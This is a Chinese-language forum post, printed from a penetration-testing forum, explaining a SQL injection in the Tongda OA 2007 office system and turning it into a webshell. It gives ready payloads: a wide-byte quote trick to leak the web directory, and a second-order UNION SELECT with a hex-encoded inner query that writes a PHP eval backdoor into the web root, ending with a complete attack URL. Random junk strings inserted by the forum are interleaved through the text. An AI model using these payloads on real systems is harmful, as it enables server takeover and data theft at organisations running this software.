中国网络渗透测试联盟

标题: 通达OA2007版本漏洞及getshell [打印本页]
作者: admin    时间: 2012-12-20 08:09
标题: 通达OA2007版本漏洞及getshell
目前测试通达OA2007版本
8 m, }2 v5 M' W" n
, v1 Z( V/ j; s* Z+ X  x 5 x" J' v/ w# J% S4 D' l2 m
Office Anywhere 2007 网络智能办公系统
6 b. A2 I+ s8 q5 C/ @) _  @
, _* [& V8 [  `9 uhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录... j. o3 _- n0 M/ i9 \& g8 v, Z

" H: Y, }# c5 z. G; _: w4 Q0 ^0 K; [- A 5 k( p! T& n8 M4 y3 j6 m+ N
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
5 W& Z/ @! ^+ F# j1 O * k, H1 |8 G. Y
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
; [( c5 g3 S5 M其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
1 K2 n# n5 Z5 h5 R
3 R4 B  J9 u% V% a, w8 t! x0 s1 `9 ~这个时候我们是不是可以组合起来使用哪?& o" N5 A" b* ~3 F& V, A8 @, Z7 Q
3 j4 V8 M: ]& L* L6 g" D+ {+ U
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样$ O" @7 y9 c- Y% x& M2 C5 C9 F* w! q
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,107 a- a) ^$ B4 h9 {" a
" z' t3 @( h! j+ V$ Z/ z
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
3 ]" j* F) x' g8 ] 5 {  z" N  h8 H+ I4 x. ~
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
; j! W' s& Z3 f   _$ K3 P; ~7 h! N' j
那么我们用字符串格式带入进行hex编码+ J9 n9 E0 D' T

; S7 D% X% ^0 p" N/ q%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
8 ^# a. M4 B* z0 J- d
# C# l6 K4 A1 h& n9 j测试ok,获取oa的webshell" k, c9 D9 o3 m& d
* x) q( O, y8 `8 t- z, n; C

( D; E' C. P" T6 l3 }% N$ tpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
2 a8 W8 t7 h$ D0 T+ j; z直接getwebshell



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2